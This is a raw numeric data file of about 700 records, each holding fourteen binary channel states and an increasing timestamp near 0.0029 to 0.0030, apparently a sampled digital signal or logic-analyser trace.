0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.9032040e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9032280e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9032360e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9032520e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9032760e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9033000e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9033240e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9033480e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9033760e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9034000e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9034280e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9034520e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9034760e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9035000e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9035240e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9035480e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9035760e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9036000e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9036280e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.9036520e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9036760e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.9037000e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9037240e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.9037480e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9037760e-03 0,1,1,0,0,1,0,0,0,0,0,0,0,0,2.9037800e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9037840e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9038280e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9038520e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9038760e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9039000e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9039240e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9039480e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9039760e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9040040e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9040280e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9040520e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9040760e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9041040e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9041280e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9041560e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9041800e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9042040e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9042280e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9042520e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9042760e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9043040e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9043080e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.9043560e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9043800e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9043880e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9044040e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9044280e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9044520e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9044760e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9045040e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9045280e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9045320e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.9045800e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9046040e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9046120e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9046280e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9046520e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9046600e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.9047040e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9047280e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9047360e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9047560e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9047800e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9048040e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9048280e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9048520e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9048760e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9048840e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.9049240e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9049520e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9049560e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9049760e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9050000e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9050280e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9050520e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9050560e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.9050760e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9051000e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9051080e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9051520e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9051760e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9052280e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9052520e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9052760e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9053000e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9053240e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9053480e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9053560e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.9053760e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9054000e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9054080e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9054280e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9054520e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9054760e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9055000e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9055240e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9055480e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9055760e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9056000e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9056280e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9056520e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9056760e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9057000e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9057240e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9057480e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9057760e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9058000e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9058040e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.9058520e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9058760e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.9059000e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9059240e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9059320e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9059480e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9059760e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9060040e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9060280e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9060520e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9060760e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9060800e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.9061240e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9061520e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9061560e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9061760e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9062000e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9062280e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9062520e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9062760e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9063000e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9063240e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9063480e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9063560e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.9064040e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9064280e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9064360e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9064520e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9064760e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9065000e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9065240e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9065480e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9065760e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9066000e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9066280e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9066520e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9066760e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9067000e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9067240e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9067320e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.9067760e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9068040e-03 0,1,1,0,0,1,0,0,0,0,0,0,0,0,2.9068080e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9068120e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9068280e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9068520e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9068760e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9069000e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9069240e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9069480e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9069560e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.9070040e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9070280e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.9070520e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9070760e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9070840e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9071000e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9071240e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9071520e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9071760e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9072000e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9072280e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.9072760e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9073000e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9073080e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9073240e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9073480e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9073560e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.9074040e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9074280e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9074360e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9074760e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9075000e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9075520e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9075760e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9075800e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.9076040e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9076280e-03 0,1,1,0,0,1,0,0,0,0,0,0,0,0,2.9076320e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9076360e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9076520e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9076760e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9077000e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9077240e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9077480e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9077760e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9078000e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9078280e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9078520e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9078760e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9078800e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.9079000e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9079240e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.9079480e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9079760e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.9080000e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9080280e-03 0,1,1,0,0,1,0,0,0,0,0,0,0,0,2.9080320e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9080360e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9080760e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9081000e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9081240e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9081480e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9081560e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.9082040e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9082280e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.9082520e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9082760e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9082840e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9083000e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9083240e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9083520e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9083760e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9084040e-03 0,1,1,0,0,0,0,0,0,1,0,0,0,0,2.9084280e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9084320e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.9084760e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9085000e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9085080e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9085240e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9085480e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9085760e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9086000e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9086280e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9086520e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9086760e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9087000e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9087240e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9087480e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9087760e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9088000e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9088280e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9088520e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9088760e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9089000e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9089240e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9089480e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9089760e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9090000e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9090280e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9090520e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9090760e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9091000e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9091240e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9091480e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9091760e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9092000e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9092280e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9092680e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9092920e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9093160e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9093400e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9093640e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,1,3.0337960e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,1,3.0340200e-03 1,1,1,0,0,0,0,0,0,0,0,1,0,1,3.0340480e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,1,3.0340720e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,1,3.0343680e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,1,3.0343960e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,1,3.0344200e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,1,3.0344440e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,1,3.0344680e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,1,3.0344920e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,1,3.0345160e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,1,3.0345440e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,1,3.0345680e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,1,3.0345960e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.0346280e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.0346440e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.0346680e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0346760e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0346920e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0347160e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0347440e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0347680e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0347960e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0348200e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0348440e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0348680e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0348920e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0349160e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0349440e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0349680e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.0349720e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.0350200e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.0350440e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0350520e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0350680e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0350920e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.0351000e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.0351400e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.0351640e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0351720e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0351920e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0352160e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0352440e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0352680e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0352920e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0353160e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0353400e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0353640e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0353920e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0354160e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0354440e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0354680e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0354920e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0355160e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0355400e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0355640e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0355920e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0356160e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0356440e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0356680e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0356920e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0357160e-03 1,1,1,0,0,0,0,0,0,1,0,0,0,0,3.0357200e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.0357240e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.0357640e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.0357920e-03 1,1,1,0,0,1,0,0,0,0,0,0,0,0,3.0357960e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0358000e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0358160e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0358440e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0358680e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0358920e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0359160e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0359400e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0359640e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0359920e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0360160e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0360440e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0360680e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0360920e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0361160e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0361400e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0361640e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0361920e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0362160e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.0362440e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.0362920e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.0363160e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0363240e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0363400e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0363640e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0363920e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0364160e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0364440e-03 1,1,1,0,0,0,0,0,0,1,0,0,0,0,3.0364680e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.0364720e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.0365160e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.0365400e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0365480e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0365640e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0365920e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.0365960e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.0366440e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.0366680e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0366760e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0367160e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0367400e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0367920e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0368160e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0368680e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0368920e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.0368960e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.0369400e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.0369640e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0369720e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0370160e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0370440e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0370680e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0370920e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0371160e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0371400e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.0371480e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.0371640e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.0371920e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.0372160e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.0372440e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0372480e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0372920e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0373160e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0373640e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0373920e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0374160e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0374440e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0374680e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0374920e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0375160e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0375400e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0375640e-03 